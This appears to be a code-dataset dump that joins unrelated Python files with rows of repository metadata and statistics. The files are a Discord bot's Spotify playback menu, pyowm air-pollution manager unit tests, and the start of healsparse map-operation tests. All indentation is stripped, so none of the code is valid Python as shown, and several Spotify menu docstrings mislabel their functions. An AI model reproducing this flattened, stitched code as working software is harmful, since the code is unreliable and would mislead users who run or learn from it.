"""go to the next page"""
await self.show_checked_page(self.current_page + 1)
async def play_pause(self, payload):
"""go to the previous page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(
_("I could not find an active device to send requests for.")
)
return
if cur.item.id == self.source.current_track.id:
if cur.is_playing:
await user_spotify.playback_pause()
else:
await user_spotify.playback_resume()
else:
if self.source.current_track.type == "track":
await user_spotify.playback_start_tracks([self.source.current_track.id])
else:
await user_spotify.playback_start_context(self.source.current_track.uri)
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
async def play_pause_all(self, payload):
"""go to the previous page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
cur = await user_spotify.playback()
if not cur:
await self.ctx.send(_("I could not find an active device to send requests for."))
return
else:
if self.source.current_track.type == "track":
await user_spotify.playback_start_tracks(
[i.id for i in self.source.entries]
)
else:
await user_spotify.playback_start_context(self.source.current_track.uri)
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
async def like_song(self, payload):
"""go to the next page"""
try:
user_spotify = tekore.Spotify(sender=self.cog._sender)
with user_spotify.token_as(self.user_token):
await user_spotify.saved_tracks_add([self.source.current_track.id])
except tekore.Unauthorised:
await self.ctx.send(_("I am not authorized to perform this action for you."))
except tekore.NotFound:
await self.ctx.send(_("I could not find an active device to send requests for."))
except tekore.Forbidden as e:
if "non-premium" in str(e):
await self.ctx.send(_("This action is prohibited for non-premium users."))
else:
await self.ctx.send(_("I couldn't perform that action for you."))
except tekore.HTTPError:
log.exception("Error grabing user info from spotify")
await self.ctx.send(
_("An exception has occured, please contact the bot owner for more assistance.")
)
await self.show_checked_page(0)
async def skip_previous(self, payload):
"""go to the first page"""
await self.show_page(0)
async def skip_next(self, payload):
"""go to the last page"""
# ListPageSource-backed menus always report a max page count, so this call is safe
await self.show_page(self._source.get_max_pages() - 1)
@menus.button("\N{CROSS MARK}")
async def stop_pages(self, payload: discord.RawReactionActionEvent) -> None:
"""stops the pagination session."""
self.stop()
del self.cog.current_menus[self.message.id]
await self.message.delete()
class SpotifyBaseMenu(menus.MenuPages, inherit_buttons=False):
def __init__(
self,
source: menus.PageSource,
cog: commands.Cog,
user_token: tekore.Token,
clear_reactions_after: bool = True,
delete_message_after: bool = False,
timeout: int = 60,
message: discord.Message = None,
**kwargs: Any,
) -> None:
super().__init__(
source,
clear_reactions_after=clear_reactions_after,
delete_message_after=delete_message_after,
timeout=timeout,
message=message,
**kwargs,
)
self.user_token = user_token
self.cog = cog
async def update(self, payload):
"""|coro|
Updates the menu after an event has been received.
Parameters
-----------
payload: :class:`discord.RawReactionActionEvent`
The reaction event that triggered this update.
"""
button = self.buttons[payload.emoji]
if not self._running:
return
try:
if button.lock:
async with self._lock:
if self._running:
await button(self, payload)
else:
await button(self, payload)
except Exception as exc:
log.debug("Ignored exception on reaction event", exc_info=exc)
async def send_initial_message(self, ctx, channel):
"""|coro|
The default implementation of :meth:`Menu.send_initial_message`
for the interactive pagination session.
This implementation shows the first page of the source.
"""
page = await self._source.get_page(0)
kwargs = await self._get_kwargs_from_page(page)
msg = await channel.send(**kwargs)
self.cog.current_menus[msg.id] = ctx.author.id
return msg
async def show_page(self, page_number):
page = await self._source.get_page(page_number)
self.current_page = page_number
kwargs = await self._get_kwargs_from_page(page)
await self.message.edit(**kwargs)
async def show_checked_page(self, page_number: int) -> None:
max_pages = self._source.get_max_pages()
try:
if max_pages is None:
# If the source does not report a maximum page count, it cannot be bounds-checked
await self.show_page(page_number)
elif page_number >= max_pages:
await self.show_page(0)
elif page_number < 0:
await self.show_page(max_pages - 1)
elif max_pages > page_number >= 0:
await self.show_page(page_number)
except IndexError:
# The requested page was out of range; safe to ignore.
pass
def reaction_check(self, payload):
"""Just extends the default reaction_check to use owner_ids"""
if payload.message_id != self.message.id:
return False
if payload.user_id not in (*self.bot.owner_ids, self._author_id):
return False
return payload.emoji in self.buttons
def _skip_single_arrows(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages == 1
def _skip_double_triangle_buttons(self):
max_pages = self._source.get_max_pages()
if max_pages is None:
return True
return max_pages <= 2
@menus.button(
"\N{BLACK LEFT-POINTING TRIANGLE}\N{VARIATION SELECTOR-16}",
position=menus.First(1),
)
async def go_to_previous_page(self, payload):
"""go to the previous page"""
await self.show_checked_page(self.current_page - 1)
@menus.button(
"\N{BLACK RIGHT-POINTING TRIANGLE}\N{VARIATION SELECTOR-16}",
position=menus.Last(0),
)
async def go_to_next_page(self, payload):
"""go to the next page"""
await self.show_checked_page(self.current_page + 1)
@menus.button(
"\N{BLACK LEFT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}\N{VARIATION SELECTOR-16}",
position=menus.First(0),
skip_if=_skip_double_triangle_buttons,
)
async def go_to_first_page(self, payload):
"""go to the first page"""
await self.show_page(0)
@menus.button(
"\N{BLACK RIGHT-POINTING DOUBLE TRIANGLE WITH VERTICAL BAR}\N{VARIATION SELECTOR-16}",
position=menus.Last(1),
skip_if=_skip_double_triangle_buttons,
)
async def go_to_last_page(self, payload):
"""go to the last page"""
# The call here is safe because it's guarded by skip_if
await self.show_page(self._source.get_max_pages() - 1)
@menus.button("\N{CROSS MARK}")
async def stop_pages(self, payload: discord.RawReactionActionEvent) -> None:
"""stops the pagination session."""
self.stop()
del self.cog.current_menus[self.message.id]
await self.message.delete()
| 38.195458
| 112
| 0.590445
| 5,708
| 47,095
| 4.699369
| 0.070953
| 0.031539
| 0.021921
| 0.029228
| 0.841895
| 0.816247
| 0.809126
| 0.793282
| 0.782024
| 0.758015
| 0
| 0.006925
| 0.307039
| 47,095
| 1,232
| 113
| 38.226461
| 0.815015
| 0.027944
| 0
| 0.714286
| 0
| 0.002976
| 0.14378
| 0.016696
| 0
| 0
| 0.002223
| 0
| 0
| 1
| 0.03869
| false
| 0.003968
| 0.013889
| 0.007937
| 0.124008
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d32c0d10ddfb9d1fcbf823e44895018a52266de4
| 15,769
|
py
|
Python
|
tests/unit/airpollutionapi30/test_airpollution_manager.py
|
Trendometrics/pyowm
|
ba1581c37a8c6a2e113a77670cc68fe2b4adeca6
|
[
"MIT"
] | 799
|
2015-01-03T12:07:57.000Z
|
2022-03-31T03:59:53.000Z
|
tests/unit/airpollutionapi30/test_airpollution_manager.py
|
Trendometrics/pyowm
|
ba1581c37a8c6a2e113a77670cc68fe2b4adeca6
|
[
"MIT"
] | 279
|
2015-02-12T16:11:43.000Z
|
2022-02-14T21:49:03.000Z
|
tests/unit/airpollutionapi30/test_airpollution_manager.py
|
Trendometrics/pyowm
|
ba1581c37a8c6a2e113a77670cc68fe2b4adeca6
|
[
"MIT"
] | 215
|
2015-01-06T19:07:11.000Z
|
2022-02-14T21:39:33.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import unittest
from pyowm.airpollutionapi30 import airpollution_client, airpollution_manager, coindex, so2index, ozone, no2index, airstatus
from pyowm.config import DEFAULT_CONFIG
from pyowm.constants import AIRPOLLUTION_API_VERSION
from pyowm.utils import timestamps
from tests.unit.airpollutionapi30.test_ozone import OZONE_JSON
from tests.unit.airpollutionapi30.test_coindex import COINDEX_JSON
from tests.unit.airpollutionapi30.test_no2index import NO2INDEX_JSON
from tests.unit.airpollutionapi30.test_so2index import SO2INDEX_JSON
from tests.unit.airpollutionapi30.test_airstatus import AIRSTATUS_JSON, AIRSTATUS_MULTIPLE_JSON
class TestAirPollutionManager(unittest.TestCase):
__test_instance = airpollution_manager.AirPollutionManager('fakeapikey', DEFAULT_CONFIG)
def mock_get_coi_returning_coindex_around_coords(self, params_dict):
return json.loads(COINDEX_JSON)
def mock_get_o3_returning_ozone_around_coords(self, params_dict):
return json.loads(OZONE_JSON)
def mock_get_no2_returning_no2index_around_coords(self, params_dict):
return json.loads(NO2INDEX_JSON)
def mock_get_air_pollution(self, params_dict):
return json.loads(AIRSTATUS_JSON)
def mock_get_forecast_air_pollution(self, params_dict):
return json.loads(AIRSTATUS_MULTIPLE_JSON)
def mock_get_historical_air_pollution(self, params_dict):
return json.loads(AIRSTATUS_MULTIPLE_JSON)
def mock_get_so2_returning_so2index_around_coords(self, params_dict):
return json.loads(SO2INDEX_JSON)
def test_instantiation_with_wrong_params(self):
self.assertRaises(AssertionError, airpollution_manager.AirPollutionManager, None, dict())
self.assertRaises(AssertionError, airpollution_manager.AirPollutionManager, 'apikey', None)
def test_airpollution_api_version(self):
result = self.__test_instance.airpollution_api_version()
self.assertIsInstance(result, tuple)
self.assertEqual(result, AIRPOLLUTION_API_VERSION)
def test_coindex_around_coords(self):
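# Pattern used throughout these tests: keep a reference to the real HTTP-client
# method, swap in a mock that returns canned JSON, exercise the manager, then
# restore the original method so later tests are unaffected.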
ref_to_original = airpollution_client.AirPollutionHttpClient.get_coi
airpollution_client.AirPollutionHttpClient.get_coi = \
self.mock_get_coi_returning_coindex_around_coords
result = self.__test_instance.coindex_around_coords(45, 9, interval='day')
airpollution_client.AirPollutionHttpClient.get_coi = ref_to_original
self.assertTrue(isinstance(result, coindex.COIndex))
self.assertIsNotNone(result.reference_time)
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.co_samples)
ref_to_original = airpollution_client.AirPollutionHttpClient.get_coi
airpollution_client.AirPollutionHttpClient.get_coi = \
self.mock_get_coi_returning_coindex_around_coords
result = self.__test_instance.coindex_around_coords(45, 9, interval=None)
airpollution_client.AirPollutionHttpClient.get_coi = ref_to_original
self.assertTrue(isinstance(result, coindex.COIndex))
self.assertEqual('year', result.interval)
def test_coindex_around_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.coindex_around_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.coindex_around_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.coindex_around_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.coindex_around_coords, \
self.__test_instance, 200, 2.5)
def test_ozone_around_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_o3
airpollution_client.AirPollutionHttpClient.get_o3 = \
self.mock_get_o3_returning_ozone_around_coords
result = self.__test_instance.ozone_around_coords(45, 9, interval='day')
airpollution_client.AirPollutionHttpClient.get_o3 = ref_to_original
self.assertTrue(isinstance(result, ozone.Ozone))
self.assertIsNotNone(result.reference_time)
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.du_value)
ref_to_original = airpollution_client.AirPollutionHttpClient.get_o3
airpollution_client.AirPollutionHttpClient.get_o3 = \
self.mock_get_o3_returning_ozone_around_coords
result = self.__test_instance.ozone_around_coords(45, 9, interval=None)
airpollution_client.AirPollutionHttpClient.get_o3 = ref_to_original
self.assertTrue(isinstance(result, ozone.Ozone))
self.assertEqual('year', result.interval)
def test_ozone_around_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.ozone_around_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.ozone_around_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.ozone_around_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.ozone_around_coords, \
self.__test_instance, 200, 2.5)
def test_no2index_around_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_no2
airpollution_client.AirPollutionHttpClient.get_no2 = \
self.mock_get_no2_returning_no2index_around_coords
result = self.__test_instance.no2index_around_coords(45, 9, interval='day')
airpollution_client.AirPollutionHttpClient.get_no2 = ref_to_original
self.assertTrue(isinstance(result, no2index.NO2Index))
self.assertIsNotNone(result.reference_time)
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.no2_samples)
ref_to_original = airpollution_client.AirPollutionHttpClient.get_no2
airpollution_client.AirPollutionHttpClient.get_no2 = \
self.mock_get_no2_returning_no2index_around_coords
result = self.__test_instance.no2index_around_coords(45, 9, interval=None)
airpollution_client.AirPollutionHttpClient.get_no2 = ref_to_original
self.assertTrue(isinstance(result, no2index.NO2Index))
self.assertEqual('year', result.interval)
def test_no2index_around_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.no2index_around_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.no2index_around_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.no2index_around_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.no2index_around_coords, \
self.__test_instance, 200, 2.5)
def test_so2index_around_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_so2
airpollution_client.AirPollutionHttpClient.get_so2 = \
self.mock_get_so2_returning_so2index_around_coords
result = self.__test_instance.so2index_around_coords(45, 9, interval='day')
airpollution_client.AirPollutionHttpClient.get_so2 = ref_to_original
self.assertTrue(isinstance(result, so2index.SO2Index))
self.assertIsNotNone(result.reference_time())
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.so2_samples)
self.assertIsNotNone(result.interval)
ref_to_original = airpollution_client.AirPollutionHttpClient.get_so2
airpollution_client.AirPollutionHttpClient.get_so2 = \
self.mock_get_so2_returning_so2index_around_coords
result = self.__test_instance.so2index_around_coords(45, 9, interval=None)
airpollution_client.AirPollutionHttpClient.get_so2 = ref_to_original
self.assertTrue(isinstance(result, so2index.SO2Index))
self.assertEqual('year', result.interval)
def test_so2index_around_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.so2index_around_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.so2index_around_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.so2index_around_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.so2index_around_coords, \
self.__test_instance, 200, 2.5)
def test_air_quality_at_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_air_pollution
airpollution_client.AirPollutionHttpClient.get_air_pollution = \
self.mock_get_air_pollution
result = self.__test_instance.air_quality_at_coords(45, 9)
airpollution_client.AirPollutionHttpClient.get_air_pollution = ref_to_original
self.assertTrue(isinstance(result, airstatus.AirStatus))
self.assertIsNotNone(result.reference_time)
self.assertIsNotNone(result.reception_time())
loc = result.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(result.air_quality_data)
def test_air_quality_at_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_at_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_at_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_at_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_at_coords, \
self.__test_instance, 200, 2.5)
def test_air_quality_forecast_at_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_forecast_air_pollution
airpollution_client.AirPollutionHttpClient.get_forecast_air_pollution = \
self.mock_get_forecast_air_pollution
result = self.__test_instance.air_quality_forecast_at_coords(45, 9)
airpollution_client.AirPollutionHttpClient.get_forecast_air_pollution = ref_to_original
self.assertTrue(isinstance(result, list))
for item in result:
self.assertIsInstance(item, airstatus.AirStatus)
self.assertIsNotNone(item.reference_time)
self.assertIsNotNone(item.reception_time())
loc = item.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(item.air_quality_data)
def test_air_quality_forecast_at_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_forecast_at_coords, \
self.__test_instance, 43.7, -200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_forecast_at_coords, \
self.__test_instance, 43.7, 200.0)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_forecast_at_coords, \
self.__test_instance, -200, 2.5)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_forecast_at_coords, \
self.__test_instance, 200, 2.5)
def test_air_quality_history_at_coords(self):
ref_to_original = airpollution_client.AirPollutionHttpClient.get_historical_air_pollution
airpollution_client.AirPollutionHttpClient.get_historical_air_pollution = \
self.mock_get_historical_air_pollution
result = self.__test_instance.air_quality_history_at_coords(45, 9, 12345678)
airpollution_client.AirPollutionHttpClient.get_historical_air_pollution = ref_to_original
self.assertTrue(isinstance(result, list))
for item in result:
self.assertIsInstance(item, airstatus.AirStatus)
self.assertIsNotNone(item.reference_time)
self.assertIsNotNone(item.reception_time())
loc = item.location
self.assertIsNotNone(loc)
self.assertIsNotNone(loc.lat)
self.assertIsNotNone(loc.lon)
self.assertIsNotNone(item.air_quality_data)
def test_air_quality_history_at_coords_fails_with_wrong_parameters(self):
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 43.7, -200.0, 12345678, 12349999)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 43.7, 200.0, 12345678, 12349999)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, -200, 2.5, 12345678, 12349999)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 200, 2.5, 12345678, 12349999)
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 200, 2.5, 'test')
self.assertRaises(ValueError, airpollution_manager.AirPollutionManager.air_quality_history_at_coords, \
self.__test_instance, 200, 2.5, 'test', 'test2')
def test_air_quality_history_at_coords_clips_end_param_to_current_timestamp(self):
now = timestamps.now(timeformat='unix')
end = now + 99999999999
def assert_clipped(obj, params_dict):
self.assertEqual(params_dict['end'], now)
airpollution_client.AirPollutionHttpClient.get_historical_air_pollution = assert_clipped
_ = self.__test_instance.air_quality_history_at_coords(45, 9, 12345678, end=end)
def test_repr(self):
print(self.__test_instance)
| 56.519713
| 124
| 0.734162
| 1,697
| 15,769
| 6.427814
| 0.074249
| 0.049505
| 0.06454
| 0.118262
| 0.90264
| 0.886047
| 0.853502
| 0.795838
| 0.759901
| 0.748992
| 0
| 0.030334
| 0.193037
| 15,769
| 278
| 125
| 56.723022
| 0.826876
| 0.002663
| 0
| 0.618257
| 0
| 0
| 0.00407
| 0
| 0
| 0
| 0
| 0
| 0.40249
| 1
| 0.107884
| false
| 0
| 0.045643
| 0.029046
| 0.190871
| 0.004149
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d37cadfaece0fd7e2444e0042d713e0e2bd7dcd0
| 42,518
|
py
|
Python
|
tests/test_operations.py
|
LSSTDESC/healsparse
|
f6b15f570ab6335328e34006f69c3919d9fcf1c8
|
[
"BSD-3-Clause"
] | 8
|
2019-05-06T11:42:41.000Z
|
2021-10-08T14:57:12.000Z
|
tests/test_operations.py
|
LSSTDESC/healsparse
|
f6b15f570ab6335328e34006f69c3919d9fcf1c8
|
[
"BSD-3-Clause"
] | 75
|
2019-03-01T23:25:26.000Z
|
2022-01-29T21:40:27.000Z
|
tests/test_operations.py
|
LSSTDESC/healsparse
|
f6b15f570ab6335328e34006f69c3919d9fcf1c8
|
[
"BSD-3-Clause"
] | 3
|
2020-01-30T19:10:19.000Z
|
2022-03-08T14:57:38.000Z
|
from __future__ import division, absolute_import, print_function
import unittest
import numpy.testing as testing
import numpy as np
import healpy as hp
from numpy import random
import healsparse
class OperationsTestCase(unittest.TestCase):
def test_sum(self):
"""
Test map addition.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test adding two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Intersection addition
# sum 2
added_map_intersection = healsparse.sum_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_sum_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_sum_intersection[gd] = hpmap1[gd] + hpmap2[gd]
testing.assert_almost_equal(hpmap_sum_intersection, added_map_intersection.generate_healpix_map())
# sum 3
added_map_intersection = healsparse.sum_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_sum_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_sum_intersection[gd] = hpmap1[gd] + hpmap2[gd] + hpmap3[gd]
testing.assert_almost_equal(hpmap_sum_intersection, added_map_intersection.generate_healpix_map())
# Union addition
# sum 2
added_map_union = healsparse.sum_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_sum_union = np.zeros_like(hpmap1) + hp.UNSEEN
# This hack works because we don't have summands going below zero...
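# healpy's UNSEEN sentinel is a large negative float (about -1.6375e+30), so
# clipping at 0 turns unseen pixels into 0 and they drop out of the union sum.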
hpmap_sum_union[gd] = np.clip(hpmap1[gd], 0.0, None) + np.clip(hpmap2[gd], 0.0, None)
testing.assert_almost_equal(hpmap_sum_union, added_map_union.generate_healpix_map())
# sum 3
added_map_union = healsparse.sum_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_sum_union = np.zeros_like(hpmap1) + hp.UNSEEN
# This hack works because we don't have summands going below zero...
hpmap_sum_union[gd] = (np.clip(hpmap1[gd], 0.0, None) +
np.clip(hpmap2[gd], 0.0, None) +
np.clip(hpmap3[gd], 0.0, None))
testing.assert_almost_equal(hpmap_sum_union, added_map_union.generate_healpix_map())
# Test adding an int constant to a map
added_map = sparse_map1 + 2
hpmapAdd2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmapAdd2[gd] = hpmap1[gd] + 2
testing.assert_almost_equal(hpmapAdd2, added_map.generate_healpix_map())
# Test adding a float constant to a map
added_map = sparse_map1 + 2.0
hpmapAdd2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmapAdd2[gd] = hpmap1[gd] + 2.0
testing.assert_almost_equal(hpmapAdd2, added_map.generate_healpix_map())
# Test adding a float constant to a map, in place
sparse_map1 += 2.0
testing.assert_almost_equal(hpmapAdd2, sparse_map1.generate_healpix_map())
def test_product(self):
"""
Test map products.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test multiplying two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# _intersection product
# product of 2
product_map_intersection = healsparse.product_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_product_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_product_intersection[gd] = hpmap1[gd] * hpmap2[gd]
testing.assert_almost_equal(hpmap_product_intersection,
product_map_intersection.generate_healpix_map())
# product of 3
product_map_intersection = healsparse.product_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_product_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_product_intersection[gd] = hpmap1[gd] * hpmap2[gd] * hpmap3[gd]
testing.assert_almost_equal(hpmap_product_intersection,
product_map_intersection.generate_healpix_map())
# Union product
# product of 2
product_map_union = healsparse.product_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_product_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_product_union[gd] = 1.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd1]] *= hpmap1[gd[gd1]]
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd2]] *= hpmap2[gd[gd2]]
testing.assert_almost_equal(hpmap_product_union, product_map_union.generate_healpix_map())
# product 3
product_map_union = healsparse.product_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_product_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_product_union[gd] = 1.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd1]] *= hpmap1[gd[gd1]]
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd2]] *= hpmap2[gd[gd2]]
gd3, = np.where(hpmap3[gd] > hp.UNSEEN)
hpmap_product_union[gd[gd3]] *= hpmap3[gd[gd3]]
testing.assert_almost_equal(hpmap_product_union, product_map_union.generate_healpix_map())
# Test multiplying an int constant to a map
mult_map = sparse_map1 * 2
hpmap_product2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_product2[gd] = hpmap1[gd] * 2
testing.assert_almost_equal(hpmap_product2, mult_map.generate_healpix_map())
# Test multiplying a float constant to a map
mult_map = sparse_map1 * 2.0
hpmap_product2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_product2[gd] = hpmap1[gd] * 2.0
testing.assert_almost_equal(hpmap_product2, mult_map.generate_healpix_map())
# Test multiplying a map by a float constant, in place
sparse_map1 *= 2.0
testing.assert_almost_equal(hpmap_product2, sparse_map1.generate_healpix_map())
def test_product_integer(self):
"""
Test map products.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
sentinel = 0
